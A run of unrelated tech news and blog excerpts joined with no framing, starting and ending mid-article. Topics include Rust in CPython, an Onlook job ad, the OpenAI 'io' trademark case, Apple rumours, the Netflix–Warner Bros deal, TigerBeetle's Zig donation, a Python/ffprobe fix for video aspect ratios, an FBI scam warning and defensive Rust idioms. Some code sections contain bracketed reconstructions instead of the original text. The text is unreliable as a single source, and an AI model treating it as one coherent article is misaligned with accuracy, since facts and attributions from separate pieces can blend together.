he has to do to support new Python versions. Another PyO3 maintainer, David
Hewitt,
agreed
, going on to suggest that perhaps CPython would benefit from looking
at the API that PyO3 has developed over time and picking "
the bits that work best
".
Raphael Gaschignard
thought
that the example Rust code Smith had provided would be a more
compelling argument for adopting Rust if it demonstrated how using the language could
simplify error handling and memory management compared to C code. Smith
pointed out
one such example, but concurred that the current
proof-of-concept code wasn't a great demonstration of Rust's benefits in this
area.
Gentoo developer Michał Górny
said
that the inclusion of Rust in CPython would be unfortunate for Gentoo,
which
supports
many niche architectures that other distributions don't:
I do realize that these platforms are not "supported" by CPython right now.
Nevertheless, even though there historically were efforts to block building on
them, they currently work and require comparatively little maintenance effort to
keep them working. Admittedly, the wider Python ecosystem with its Rust adoption
puts quite a strain on us and the user experience worsens every few months, we
still manage to provide a working setup.
[...]
That said, I do realize that we're basically obsolete and it's just a matter of
time until some projects pulls the switch and force us to tell our users "sorry,
we are no longer able to provide a working system for you".
Hewitt
offered
assistance with Górny's integration problems. "
I build PyO3 [...] to empower
more people to write software, not to alienate.
" Górny
appreciated
the thought, but reiterated that the problem here was Rust
itself and its platform support.
Scaling back
In response to the concerns raised in the discussion, Smith and Podoprigora
scaled back
the goals of the proposal, saying that it should be limited to
using Rust for optional extension modules (i.e. speeding up parts of the
standard library) for the foreseeable future. They still
want to see Rust adopted in CPython's core eventually, but a more gradual
approach should help address problems raised by bootstrapping, language
portability, and related concerns that people raised in the thread, Smith said.
That struck some people as too conservative. Jelle Zijlstra
said
that if the proposal were limited to optional extension modules, it
would bring complexity to the implementation of the
standard library for a marginal benefit. Many
people are excited about bringing Rust to CPython, Zijlstra said, but
restricting Rust code to optional modules means putting Rust in the place that it
will do the least good for the CPython code. Several other commenters agreed.
Smith
pushed back
, saying that moving to Rust was a long-term investment in the
quality of the code, and that having a slow, conservative early period of
the transition would help build out the knowledge and experience necessary to
make the transition succeed. She later
clarified
that a lot of the benefit she saw from this overly careful
proposal was doing the groundwork to make using Rust possible at all: sorting
out the build-system integration, starting to gather feedback from users and
maintainers, and prototyping what a native Rust API for Python could look like.
All of that has to happen before it makes sense to consider Rust in the core
code — so even though she eventually wants to reach that state, it makes sense
to start here.
At the time of writing, the discussion is still ongoing. The Python community
has not reached a firm conclusion about the adoption of Rust — but it has
definitely ruled out a
fast
adoption. If Smith and Podoprigora's
proposal moves forward, it still seems like it will be several years before Rust is
adopted in CPython's core code, if it ever is. Still, the discussion also
revealed a lot of enthusiasm for Rust — and that many people would rather
contribute code written in Rust than attempt to wrestle with CPython's existing
C code.
Onlook (YC W25) the Cursor for Designers Is Hiring a Founding Fullstack Engineer
Hey HN! I'm Daniel, building Onlook, the Cursor for Designers. We built an open-source collaborative canvas for code that lets designers and developers craft incredible web experiences together.
Since launching, Onlook hit #1 on Hacker News, was the #1 trending repo on GitHub—above DeepSeek + Anthropic—and has earned over 23,000 GitHub stars. We’re looking to bring on Onlook’s first Founding Engineers.
This role requires autonomy - you’ll be setting standards for one of the fastest-growing YC-backed open source projects ever. You’ll help design and build an uncompromising visual IDE loved by tens of thousands of designers and engineers around the world, and you'll have a heavy influence on where we take the company.
You’re a full-stack engineer based in the U.S. who is ultra-comfortable in TypeScript, Next.js, React, and Tailwind, and ready to jump in and build.
The most important things we look for:
• Olympic-level dedication – you want to be the best in the world at what you do.
• Ownership – you like autonomy and control over the destiny of the company.
• Speed – you’re comfortable shipping and iterating quickly with feedback.
• Craft – you’re opinionated and are willing to defend your opinions.
Ideally, you:
• Are looking for a fast-paced, early startup environment.
• Are willing to put in long hours and go the extra mile.
• Are comfortable with any part of the stack, front-end, back-end, or database.
• Believe in open source and are ok with your work being very public.
The comp range for this role is $130k-200k, 1-5% equity, great healthcare + other perks, and an awesome office if you happen to be in SF. We're open to remote / hybrid candidates.
If you’d like to stand out, please share a project or piece of work that you’re most proud of. We love seeing people’s work. If you have a personal website, please include that as well.
A U.S. appeals court has upheld a temporary restraining order that prevents OpenAI and Jony Ive's new hardware venture from using the name "io" for products similar to those planned by AI audio startup iyO,
Bloomberg Law
reports.
iyO
sued OpenAI earlier this year
after the latter announced its partnership with Ive's new firm, arguing that OpenAI's planned "io" branding was too close to its own name and related to similar AI-driven hardware. Court filings later showed that Ive and Sam Altman chose the name io in mid-2023, and that iyO CEO Jason Rugolo had approached Altman in early 2025 seeking funding for a project about "the future of human-computer interface." Altman declined, saying he was already working on "something competitive."
OpenAI countered that io's first product would not be a wearable device, and that Rugolo had voluntarily disclosed details about iyO while suggesting OpenAI acquire his company for $200 million. Despite this, a district court issued a temporary restraining order blocking OpenAI, Altman, Ive, and IO Products, Inc. from using the io mark in connection with products deemed sufficiently similar to iyO's planned AI-audio computer. OpenAI removed its io branding shortly after.
The Ninth Circuit affirmed the order earlier this week. The court agreed there was a likelihood of confusion between "IO" and "iyO," that reverse confusion was a significant risk given OpenAI's size, and that iyO could face irreparable harm to its brand and fundraising. However, the ruling does not bar all uses of the io name, only marketing and selling hardware similar to iyO's.
The case now returns to the district court for a preliminary injunction hearing in April 2026, with the broader litigation expected to extend into 2027 and 2028. OpenAI's first hardware device is expected to
launch next year
.
We're getting closer to the launch of the final major iOS update of the year, with Apple set to release iOS 26.2 in December. We've had three betas so far and are expecting a fourth beta or a release candidate this week, so a launch could follow as soon as next week.
Past Launch Dates
Apple's past iOS x.2 updates from the last few years have all happened right around the middle of the...
Tuesday December 2, 2025 11:09 am PST by
Juli Clover
Apple is encouraging iPhone users who are still running iOS 18 to upgrade to iOS 26 by making the iOS 26 software upgrade option more prominent.
Since iOS 26 launched in September, it has been displayed as an optional upgrade at the bottom of the Software Update interface in the Settings app. iOS 18 has been the default operating system option, and users running iOS 18 have seen iOS 18...
Apple is expected to launch a new foldable iPhone next year, based on multiple rumors and credible sources. The long-awaited device has been rumored for years now, but signs increasingly suggest that 2026 could indeed be the year that Apple releases its first foldable device.
Subscribe to the MacRumors YouTube channel for more videos.
Below, we've collated an updated set of key details that ...
Wednesday December 3, 2025 10:33 am PST by
Juli Clover
Apple today seeded the release candidate versions of upcoming iOS 26.2 and iPadOS 26.2 updates to developers and public beta testers, with the software coming two weeks after Apple seeded the third betas. The release candidates represent the final versions of iOS 26.2 and iPadOS 26.2 that will be provided to the public if no further bugs are found during this final week of testing....
In a statement shared with Bloomberg on Wednesday, Apple confirmed that its software design chief Alan Dye will be leaving. Apple said Dye will be succeeded by Stephen Lemay, who has been a software designer at the company since 1999.
Meta CEO Mark Zuckerberg announced that Dye will lead a new creative studio within the company's AR/VR division Reality Labs.
On his blog Daring Fireball,...
Apple's iPhone 17 lineup is selling well enough that Apple is on track to ship more than 247.4 million total iPhones in 2025, according to a new report from IDC.
Total 2025 shipments are forecast to grow 6.1 percent year over year due to iPhone 17 demand and increased sales in China, a major market for Apple.
Overall worldwide smartphone shipments across Android and iOS are forecast to...
2026 could be a bumper year for Apple's Mac lineup, with the company expected to announce as many as four separate MacBook launches. Rumors suggest Apple will court both ends of the consumer spectrum, with more affordable options for students and feature-rich premium lines for users that seek the highest specifications from a laptop.
Below is a breakdown of what we're expecting over the next ...
The iPhone Air has recorded the steepest early resale value drop of any iPhone model in years, with new data showing that several configurations have lost almost 50% of their value within ten weeks of launch.
According to a ten-week analysis published by SellCell, Apple's latest lineup is showing a pronounced split in resale performance between the iPhone 17 models and the iPhone Air....
iPhone 17 Pro models, it turns out, can't take photos in Night mode when Portrait mode is selected in the Camera app – a capability that's been available on Apple's Pro devices since the iPhone 12 Pro in 2020.
If you're an iPhone 17 Pro or iPhone 17 Pro Max owner, try it for yourself: Open the Camera app with Photo selected in the carousel, then cover the rear lenses with your hand to...
Apple's iPhone development roadmap runs several years into the future and the company is continually working with suppliers on several successive iPhone models at the same time, which is why we often get rumored features months ahead of launch. The iPhone 18 series is no different, and we already have a good idea of what to expect for the iPhone 18 Pro and iPhone 18 Pro Max.
One thing worth...
Netflix Agrees to Buy Warner Bros., Including HBO, for $83 Billion
Daring Fireball
www.latimes.com
2025-12-05 16:47:44
Meg James, reporting for The Los Angeles Times (News+ link):
The two companies announced the blockbuster deal early Friday
morning. The takeover would give Netflix such beloved characters
as Batman, Harry Potter and Fred Flintstone.
Fred Flintstone?
“Our mission has always been to entertai...
Netflix has prevailed in its bid to buy Warner Bros., agreeing to pay $72 billion for the Burbank-based Warner Bros. film and television studios, HBO Max and HBO.
The two companies announced the blockbuster deal early Friday morning. The takeover would give Netflix such beloved characters as Batman, Harry Potter and Fred Flintstone.
“Our mission has always been to entertain the world,” Ted Sarandos, co-CEO of Netflix, said in a statement. “By combining Warner Bros.’ incredible library of shows and movies — from timeless classics like ‘Casablanca’ and ‘Citizen Kane’ to modern favorites like ‘Harry Potter’ and ‘Friends’ — with our culture-defining titles like ‘Stranger Things,’ ‘KPop Demon Hunters’ and ‘Squid Game,’ we’ll be able to do that even better.”
Netflix’s cash and stock transaction is valued at about $27.75 per Warner Bros. Discovery share. Netflix also agreed to take on more than $10 billion in Warner Bros. debt, pushing the deal’s value to $82.7 billion.
The breakthrough came earlier this week, after the three contenders — Netflix, Paramount and Comcast — submitted binding second-round offers. Netflix’s victory was assured by late Thursday, soon after another deadline for last-minute deal sweeteners. Netflix and Warner’s boards separately and unanimously approved the transaction.
Warner’s cable channels, including CNN, TNT and HGTV, are not included in the deal. They will form a new publicly traded company, Discovery Global, in mid-2026.
Anti-trust experts anticipate opposition to Netflix’s proposed takeover. Netflix has more than 300 million streaming subscribers worldwide, and with HBO Max, the company’s base would swell to more than 420 million subscribers — a staggering sum much greater than any of the other premium video-on-demand streaming services.
In addition, Netflix has long prioritized releasing movies to its streaming platform — bypassing movie theater chains.
The deal posed “an unprecedented threat to the global exhibition business,” Cinema United, a trade group representing owners of more than 50,000 movie screens, said in a statement announcing its opposition.
“The negative impact of this acquisition will impact theatres from the biggest circuits to one-screen independents in small towns in the United States and around the world,” Cinema United President Michael O’Leary said in a statement. “Netflix’s stated business model does not support theatrical exhibition.”
Netflix, in the statement, said it would maintain Warner Bros. operations, including theatrical releases for Warner Bros. films.
The Directors Guild of America said the proposed combination “raises significant concerns.”
“A vibrant, competitive industry — one that fosters creativity and encourages genuine competition for talent — is essential to safeguarding the careers and creative rights of directors and their teams,” the DGA spokesperson said. “We will be meeting with Netflix to outline our concerns and better understand their vision for the future of the company.”
Losing the auction is a crushing blow for Paramount’s David Ellison, the 42-year-old tech scion who envisioned building a juggernaut with the two storied movie studios, HBO and two dozen cable channels.
One month after buying Paramount, he set his sights on Warner Bros., triggering the auction with a series of unsolicited bids in September and early October.
But Warner Bros. Discovery’s board rejected Paramount’s offers as too low. In late October, the board opened the auction up to other bidders.
Comcast also leaped into the bidding for Warner’s studios, HBO and its streaming service. Comcast wanted to spin off its NBCUniversal media assets and merge them with Warner Bros. to form a new jumbo studio.
Synadia
and TigerBeetle have together pledged $512,000 to the
Zig Software Foundation
over the next two
years in support of the language, leadership, and communities building
the future of simpler systems software.
I first saw Zig in 2018, seven years ago. Two years later, I chose
Zig over C or Rust for TigerBeetle.
What I learned is that if you could centralize resource allocation in
time and space (the dimensions that prove tricky for humans writing
software) then this could not only simplify memory management, to design
away some of the need for a borrow checker in the first place, but, more
importantly, also be a forcing function for propagating good design, to
encourage teams to think through the explicit limits or physics of the
software (you have no choice).
From a performance perspective, I didn’t want TigerBeetle to be
fearlessly multithreaded.
Transaction
processing workloads tend to have inherent contention
, even to the
point of power law, precluding partitioning and necessitating a
single-threaded architecture. Therefore, Rust’s borrow checker, while a
phenomenal tool for the class of problems it targets, made less sense
for TigerBeetle. TigerBeetle never frees memory and never runs
multithreaded, instead using explicit submission/completion queue
interfaces by design.
Finally, while the borrow checker could achieve local memory safety,
TigerBeetle needed more correctness properties. TigerBeetle needed to be
always correct, and across literally thousands of invariants.
As matklad
would say, this is a harder problem!
I had also spent enough time in
memory safe languages to know that local memory safety is no guarantee
of local correctness, let alone distributed system correctness. Per
systems thinking, I believe that total correctness is a design problem,
not a language problem. Language is valuable. But no human language can
guarantee the next Hemingway or Nabokov. For this you need philosophy.
Even then it’s not a guarantee but a probability.
With Rust off the table, the choice fell to C or Zig. A language of
the past or future?
Zig was early, which gave me pause, but I felt that the quality of
Andrew Kelley’s design decisions in the language, the standard library
(e.g. the unmanaged hashmap interface) and the cross-compilation
toolchain, even five years ago, was already exceptional.
Andrew’s philosophy resonated with what I wanted to explore in
TigerStyle. No hidden memory allocations. No hidden control flow. No
preprocessor. No macros. And then you get things like comptime, reducing
the grammar and dimensionality of the language, while simultaneously
multiplying its power. The primary benefit of Zig is the favorable ratio
of expressivity to language complexity.
As a replacement for C, Zig fixed not only the small cuts, such as
explicit alignment in the type system for Direct I/O, or safer casts,
but the showstoppers of spatial memory safety through bounds checking,
and, to a lesser degree (but not guarantee), temporal memory safety
through the debug allocator.
Zig also enabled checked arithmetic by default in safe builds, which
is something I believe only Ada and Swift do (remarkably, Rust disables
checked arithmetic by default in safe builds—a default I would love to
see changed). TigerBeetle separates the data plane from the control
plane by design, through batching, so the runtime cost of these safety
checks was not material, being amortized in the data plane across bigger
buffers. While a borrow checker or static allocation can simplify memory
management, getting logic and arithmetic correct remains hard. Of
course, you can enable checked arithmetic in other languages, but I
appreciated Andrew’s concern for checked arithmetic and stricter
operands by default.
In all these things, what impressed me most was Zig’s approach to
safety when working with the metal. Not in terms of an on/off decision,
but as a spectrum. Not aiming for 100% guarantees across 1 or 2
categories, but 90% and then across more categories. Not eliminating
classes of bugs, but downgrading their probability. All while preserving
the power-to-weight ratio of the language, to keep the language
beautifully simple.
Many languages start simple and grow complex as features are added.
Zig’s simplicity is unusual in that it comes from a subtractive
discipline (e.g. no private fields) rather than a deferred complexity;
minimizing surface area is part of the ethos of the language. The
simplicity of Zig meant that we could hire great programmers from any
language background—they could pick up Zig in a weekend. Indeed, I’ve
never had to talk to a new hire about learning Zig.
Finally, there was the timing. I recognized that TigerBeetle would take time
to reach production (we shipped production in 2024, after 3.5 years of
development), giving Zig time to mature and our trajectories time to
intersect.
Investing in creating a database like TigerBeetle is a long term
effort. Databases tend to have a long half life (e.g. Postgres is 30
years old). And so, while Zig being early in 2020 did give me pause,
nevertheless Zig’s quality, philosophy and simplicity made sense for a
multi-decade horizon.
How has the decision for Zig panned out?
TigerBeetle is tested end-to-end under some pretty extreme fuzzing.
We did have three bugs that would have been prevented by the borrow
checker, but these were caught by our fuzzers and online verification.
We run a fuzzing fleet of 1,000 dedicated CPU cores 24/7. We invest in
deterministic simulation testing (e.g.
VOPR
),
as well as non-deterministic fault-injection harnesses (e.g.
Vörtex
).
We engaged Kyle Kingsbury in
one of the longest
Jepsen audits to date
—four times the typical duration. Through all
this, Zig’s quality held up flawlessly.
Zig has also been a huge part of our success as a company.
TigerBeetle is only 5 years old but is already migrating some of the
largest brokerages, exchanges and wealth managements in their respective
jurisdictions. Several of our key enterprise contracts were thanks to
the CTOs and even CEOs of these companies also following Zig and seeing
the quality we wanted to achieve with it. I don’t think we could have
written TigerBeetle
as
it is, in any other language
, at least not to the same tight
tolerances, let alone with the same velocity.
Zig’s language specification will only reach 1.0 when all
experimental areas of the language (e.g. async I/O) are finally done.
For TigerBeetle, we care only about the stable language features we use,
testing our binaries end to end, as we would for any language.
Nevertheless, upgrading to new versions, even with breaking changes, has
only been a pleasure for us as a team. The upgrade work is usually fully
paid for by compilation time reduction. For example, the upgrade from
Zig 0.14.1 to Zig 0.15.2 (with the native x86_64 backend) makes debug
builds 2x faster, and even LLVM release builds become 1.6x faster. With
each release, you can literally feel the sheer amount of effort that the
entire Zig core team put into making Zig the world’s most powerful
programming language—and toolchain.
Back in 2020, from a production perspective, Zig was more or less a
frontend to LLVM, the same compiler used by Rust, Swift and other
languages. However, by not shying away from also investing in its own
independent compiler backends and toolchain, by appreciating the value
of replacing LLVM long term, Zig is becoming well positioned to gain a
low-level precision and compilation speed that generic LLVM won’t always
be able to match.
We want Andrew to take his time, to get these things right for the
long term. Fred Brooks once said that
conceptual
integrity
is “the most important consideration” in system design,
that the design must proceed from one mind.
In this spirit, I am grateful for Andrew’s remarkably strong
leadership (and taste) in the design of the language and toolchain.
There can be thankless pressure on an open source project to give in to
the tragedy of the commons. But if anything, in hindsight I think this
is what I’ve most appreciated about choosing Zig for TigerBeetle, that
Zig has a strong BDFL.
Of course, some may hear “BDFL” and see governance risk. But I fear
the opposite: conceptual risk, the harder problem. Brooks was
right—conceptual integrity is almost certainly doomed by committee.
Whereas governance is easier solved: put it in the hands, not of the
corporates, but of the people. The individuals who choose each day to
continue to donate.
This is why our pledge today, along with all other ZSF donors, is a
simple donation with no strings attached. The Zig Software Foundation is
well managed, transparent and independent. We want it to remain this
way. The last thing we want is some kind of foundation “seat”. Andrew is
Chef. We want to let him cook, and pay his core team sustainably (e.g.
92 percent of the budget goes to directly paying contributors
).
If cooking is one metaphor, then surfing is another. I believe that
technology moves in waves. The art is not in paddling to the wave with a
thousand surfers on it. But in spotting the swell before it breaks. And
then enjoying the ride with the early adopters who did the same: River, Ghostty, Bun, Mach, and many fellow surfers.
In fact, it was through Zig that I met
Derek Collison
, who like me had
been sponsoring the language in his personal capacity since 2018. As a
former CTO at VMware, Derek was responsible for backing
antirez
to work full time on Redis. Derek
later went on to create
NATS
, founding
Synadia
.
As we were about to increase TigerBeetle’s yearly donation to Zig, I
reached out to Derek, and we decided to do a joint announcement,
following Mitchell
Hashimoto’s lead
: each of our companies will donate $256,000 in monthly installments over the next two years, with Synadia matching TigerBeetle, for a total of $512,000. The first installment has already been made.
Please consider
donating
or
increasing your donation if you can. And if you are a CEO or CTO, please
team up with another company to outmatch us! Thanks Andrew for creating
something special, and to all who code for the joy of the craft:
When I embed videos in web pages, I specify an
aspect ratio
. For example, if my video is 1920 × 1080 pixels, I’d write:
<video style="aspect-ratio: 1920 / 1080">
If I also set a width or a height, the browser now knows exactly how much space this video will take up on the page – even if it hasn’t loaded the video file yet. When it initially renders the page, it can leave the right gap, so it doesn’t need to rearrange when the video eventually loads. (The technical term is “reducing
cumulative layout shift
”.)
That’s the idea, anyway.
I noticed that some of my videos weren’t fitting in their allocated boxes. When the video file loaded, it could be too small and get letterboxed, or be too big and force the page to rearrange to fit. Clearly there was a bug in my code for computing aspect ratios, but what?
Three aspect ratios, one video
I opened one of the problematic videos in QuickTime Player, and the resolution listed in the Movie Inspector was rather curious:
Resolution: 1920 × 1080 (1350 × 1080)
.
The first resolution is what my code was reporting, but the second resolution is what I actually saw when I played the video. Why are there two?
The
storage aspect ratio (SAR)
of a video is the pixel resolution of a raw frame. If you extract a single frame as a still image, that’s the size of the image you’d get. This is the first resolution shown by QuickTime Player, and it’s what I was reading in my code.
I was missing a key value – the
pixel aspect ratio (PAR)
. This describes the shape of each pixel, in particular the width-to-height ratio. It tells a video player how to stretch or squash the stored pixels when it displays them. This can sometimes cause square pixels in the stored image to appear as rectangles.
PAR < 1
portrait pixels
PAR = 1
square pixels
PAR > 1
landscape pixels
This reminds me of
EXIF orientation
for still images – a transformation that the viewer applies to the stored data. If you don’t apply this transformation properly, your media will look wrong when you view it. I wasn’t accounting for the pixel aspect ratio in my code.
According to Google, the primary use case for non-square pixels is standard-definition televisions, which predate digital video. However, I’ve encountered several videos with an unusual PAR that were made long into the era of digital video, when that seems unlikely to be a consideration. It’s especially common in vertical videos like YouTube Shorts, where the stored resolution is a square 1080 × 1080 and the pixel aspect ratio stretches it into a portrait.
I wonder if it’s being introduced by a processing step somewhere? I don’t understand why, but I don’t have to – I’m only displaying videos, not producing them.
The
display aspect ratio (DAR)
is the size of the video as viewed – what happens when you apply the pixel aspect ratio to the stored frames. This is the second resolution shown by QuickTime Player, and it’s the aspect ratio I should be using to preallocate space in my video player.
These three values are linked by a simple formula:
DAR = SAR × PAR
The size of the viewed video is the stored resolution times the shape of each pixel.
The stored frame may not be what you see
One video with a non-unit pixel aspect ratio is my download of
Mars EDL 2020 Remastered
. This video by Simeon Schmauß tries to match what the human eye would have seen during the landing of NASA’s
Perseverance
rover
in 2021.
We can get the width, height, and
sample aspect ratio
(which is another name for pixel aspect ratio) using ffprobe:
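(The command itself isn’t reproduced above; based on the flags used in the Python function later in this post, it would be something like the following, with MarsEDL.mp4 as a stand-in filename.)

ffprobe -v error -select_streams v:0 -show_entries stream=width,height,sample_aspect_ratio MarsEDL.mp4

which prints output along these lines:

[STREAM]
width=1920
height=1080
sample_aspect_ratio=45:64
[/STREAM]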
Here
1920
is the stored width, and
45:64
is the pixel aspect ratio. We can multiply them together to get the display width:
1920 × 45 / 64 = 1350
. This matches what I saw in QuickTime Player.
Let’s extract a single frame using
ffmpeg
, to get the stored pixels. This command saves the 5000th frame as a PNG image:
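(The exact command isn’t shown above; one way to do it is with ffmpeg’s select filter. The filter counts frames from zero, so the 5000th frame is n=4999; the filenames here are stand-ins.)

ffmpeg -i MarsEDL.mp4 -vf "select=eq(n\,4999)" -frames:v 1 frame_5000.png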
The image is 1920 × 1080 pixels, and it looks wrong: the circular parachute is visibly stretched.
Suppose we take that same image, but now apply the pixel aspect ratio. This is what the image is meant to look like, and it’s not a small difference – now the parachute actually looks like a circle.
Seeing both versions side-by-side makes the problem obvious: the stored frame isn’t how the video is displayed. The video player in my browser will play it correctly using the pixel aspect ratio, but my layout code wasn’t doing that. I was telling the browser the wrong aspect ratio, and the browser had to update the page when it loaded the video file.
Getting the correct display dimensions in Python
This is my old function for getting the dimensions of a video file, which uses a
Python wrapper around MediaInfo
to extract the width and height fields. I now realise that this only gives me the storage aspect ratio, and may be misleading for some videos.
from pathlib import Path
from pymediainfo import MediaInfo

def get_storage_aspect_ratio(video_path: Path) -> tuple[int, int]:
    """
    Returns the storage aspect ratio of a video, as a width/height ratio.
    """
    media_info = MediaInfo.parse(video_path)

    try:
        video_track = next(
            tr
            for tr in media_info.tracks
            if tr.track_type == "Video"
        )
    except StopIteration:
        raise ValueError(f"No video track found in {video_path}")

    return video_track.width, video_track.height
I can’t find an easy way to extract the pixel aspect ratio using pymediainfo. It does expose a
Track.aspect_ratio
property, but that’s a string which has a rounded value – for example,
45:64
becomes
0.703
. That’s close, but the rounding introduces a small inaccuracy. Since I can get the complete value from ffprobe, that’s what I’m doing in my revised function.
The new function is longer, but it’s more accurate:
from fractions import Fraction
import json
from pathlib import Path
import subprocess

def get_display_aspect_ratio(video_path: Path) -> tuple[int, int]:
    """
    Returns the display aspect ratio of a video, as a width/height fraction.
    """
    cmd = [
        "ffprobe",
        # verbosity level = error
        "-v", "error",
        # only get information about the first video stream
        "-select_streams", "v:0",
        # only gather the entries I'm interested in
        "-show_entries", "stream=width,height,sample_aspect_ratio",
        # print output in JSON, which is easier to parse
        "-print_format", "json",
        # input file
        str(video_path),
    ]

    output = subprocess.check_output(cmd)
    ffprobe_resp = json.loads(output)

    # The output will be structured something like:
    #
    # {
    #   "streams": [
    #     {
    #       "width": 1920,
    #       "height": 1080,
    #       "sample_aspect_ratio": "45:64"
    #     }
    #   ],
    #   …
    # }
    #
    # If the video doesn't specify a pixel aspect ratio, then it won't
    # have a `sample_aspect_ratio` key.
    video_stream = ffprobe_resp["streams"][0]

    try:
        pixel_aspect_ratio = Fraction(
            video_stream["sample_aspect_ratio"].replace(":", "/")
        )
    except KeyError:
        pixel_aspect_ratio = 1

    width = round(video_stream["width"] * pixel_aspect_ratio)
    height = video_stream["height"]

    return width, height
This is calling the
ffprobe
command I showed above, plus
-print_format json
to print the data in JSON, which is easier for Python to parse.
I have to account for the case where a video doesn’t set a sample aspect ratio – in that case, the displayed video just uses square pixels.
Since the aspect ratio is expressed as a ratio of two integers, this felt like a good chance to try the
fractions
module
. That avoids converting the ratio to a floating-point number, which potentially introduces inaccuracies. It doesn’t make a big difference, but in my video collection treating the aspect ratio as a
float
produces results that are 1 or 2 pixels different from QuickTime Player.
When I multiply the stored width and aspect ratio, I’m using the
round()
function
to round the final width to the nearest integer. That’s more accurate than
int()
, which always rounds down.
Conclusion: use display aspect ratio
When you want to know how much space a video will take up on a web page, look at the display aspect ratio, not the stored pixel dimensions. Pixels can be squashed or stretched before display, and the stored width/height won’t tell you that.
Videos with non-square pixels are pretty rare, which is why I ignored this for so long. I’m glad I finally understand what’s going on.
After switching to ffprobe and using the display aspect ratio, my pre-allocated video boxes now match what the browser eventually renders – no more letterboxing, no more layout jumps.
FBI warns of virtual kidnapping scams using altered social media photos
Bleeping Computer
www.bleepingcomputer.com
2025-12-05 16:37:28
The FBI warns of criminals altering images shared on social media and using them as fake proof of life photos in virtual kidnapping ransom scams.
This is part of a public service announcement published today about criminals contacting victims via text message, claiming to have kidnapped a family member and demanding ransom payments.
However, as the FBI explained, virtual kidnapping scams involve no actual abduction. Instead, criminals use manipulated images found on social networks and publicly available information to create convincing scenarios designed to pressure victims into paying ransoms before verifying that their loved ones are safe.
"Criminal actors typically will contact their victims through text message claiming they have kidnapped their loved one and demand a ransom be paid for their release," the
FBI said
on Friday.
"Oftentimes, the criminal actor will express significant claims of violence towards the loved one if the ransom is not paid immediately. The criminal actor will then send what appears to be a genuine photo or video of the victim's loved one, which upon close inspection often reveals inaccuracies when compared to confirmed photos of the loved one."
The law enforcement agency advised the public to be cautious of scammers who often create a false sense of urgency and to carefully assess the validity of the kidnappers' claims.
To defend against such scams, the FBI recommends taking several protective measures, such as avoiding providing personal information to strangers while traveling and establishing a code word known only to the family to verify communications during emergencies.
Additionally, when sharing information about missing persons online, one should remain vigilant, as scammers might reach out with false information.
The FBI also recommends taking screenshots or recording proof-of-life photos whenever possible for later analysis during investigations, since scammers sometimes deliberately send these photos using timed message features to limit the time victims have to analyze the images.
While the FBI didn't share how many complaints regarding these virtual kidnapping scams have been filed with its Internet Crime Complaint Center or how widespread this type of fraud is at the moment, BleepingComputer has
found
multiple
instances
of people targeted by similar scams that
spoofed their loved ones' phone numbers
.
Broken IAM isn't just an IT problem - the impact ripples across your whole business.
This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.
Whenever I see the comment
// this should never happen
in code, I try to find out the exact conditions under which
it could
happen.
And in 90% of cases, I find a way to do just that.
More often than not, the developer just hasn’t considered all edge cases or future code changes.
In fact, the reason why I like this comment so much is that it often
marks the exact spot
where strong guarantees fall apart.
Often, the root cause is an implicit invariant that isn’t enforced by the compiler.
Yes, the compiler prevents memory safety issues, and the standard library is best-in-class.
But even the standard library
has its warts
and bugs in business logic can still happen.
All we can work with are hard-won patterns for writing more defensive Rust code, learned over years of shipping Rust to production.
I’m not talking about design patterns here, but rather small idioms, which are rarely documented, but make a big difference in the overall code quality.
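The snippet under discussion isn’t reproduced here; a minimal sketch of the fragile pattern, with stand-in User and RepositoryError types (only DuplicateUsers appears in the original), looks like this:

// Hypothetical sketch of the fragile version.
#[derive(Clone)]
struct User {
    name: String,
}

enum RepositoryError {
    NotFound,
    DuplicateUsers,
}

fn find_user(matching_users: Vec<User>) -> Result<User, RepositoryError> {
    if matching_users.is_empty() {
        return Err(RepositoryError::NotFound);
    }
    // Nothing ties this indexing to the check above: move or delete the
    // check during a refactor and this line panics on an empty vector.
    Ok(matching_users[0].clone())
}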
What if you refactor it and forget to keep the
is_empty()
check?
The problem is that the vector indexing is decoupled from checking the length.
So
matching_users[0]
can panic at runtime if the vector is empty.
Checking the length and indexing are two separate operations, which can be changed independently.
That’s our first implicit invariant that’s not enforced by the compiler.
If we use slice pattern matching instead, we’ll only get access to the element if the correct
match
arm is executed.
match matching_users.as_slice() {
    [] => todo!("What to do if no users found!?"),
    [existing_user] => {
        // Safe! Compiler guarantees exactly one element.
        // No need to index into the vector,
        // we can directly use `existing_user` here.
    }
    _ => Err(RepositoryError::DuplicateUsers),
}
Note how this automatically uncovered one more edge case: what if the list is empty?
We hadn’t explicitly considered this case before.
The compiler-enforced pattern matching requires us to think about all possible states!
This is a common pattern in all robust Rust code: putting the compiler in charge of enforcing invariants.
When initializing an object with many fields, it’s tempting to use
..Default::default()
to fill in the rest.
In practice, this is a common source of bugs.
You might forget to explicitly set a new field later when you add it to the struct (thus using the default value instead, which might not be what you want), or you might not be aware of all the fields that are being set to default values.
Instead of this:
let foo = Foo {
    field1: value1,
    field2: value2,
    ..Default::default() // Implicitly sets all other fields
};
Do this:
let foo = Foo {
    field1: value1,
    field2: value2,
    field3: value3, // Explicitly set all fields
    field4: value4, // ...
};
Yes, it’s slightly more verbose, but what you gain is that the compiler will force you to handle all fields explicitly.
Now when you add a new field to
Foo
, the compiler will remind you to set it here as well and reflect on which value makes sense.
If you still prefer to use
Default
but don’t want to lose compiler checks, you can also destructure the default instance:
let Foo { field1, field2, field3, field4 } = Foo::default();
This way, you get all the default values assigned to local variables and you can still override what you need:
let foo = Foo {
    field1: value1, // Override what you need
    field2: value2, // Override what you need
    field3,         // Use default value
    field4,         // Use default value
};
This pattern gives you the best of both worlds:
You get default values without duplicating default logic
The compiler will complain when new fields are added to the struct
Your code automatically adapts when default values change
It’s clear which fields use defaults and which have custom values
Completely destructuring a struct into its components can also be a defensive strategy for API adherence.
For example, let’s say you’re building a pizza ordering system and have an order type like this:
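The original struct definition isn’t reproduced above; based on the fields referenced below, it would have looked something like this (the PizzaSize, Topping, and CrustType definitions here are stand-ins so the sketch is self-contained):

use std::time::SystemTime;

// Stand-in field types for illustration only.
#[derive(PartialEq)]
enum PizzaSize { Small, Medium, Large }

#[derive(PartialEq)]
enum Topping { Mushrooms, Olives, Pepperoni }

#[derive(PartialEq)]
enum CrustType { Thin, Thick, Stuffed }

struct PizzaOrder {
    size: PizzaSize,
    toppings: Vec<Topping>,
    crust_type: CrustType,
    ordered_at: SystemTime,
}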
For your order tracking system, you want to compare orders based on what’s actually on the pizza - the
size
,
toppings
, and
crust_type
. The
ordered_at
timestamp shouldn’t affect whether two orders are considered the same.
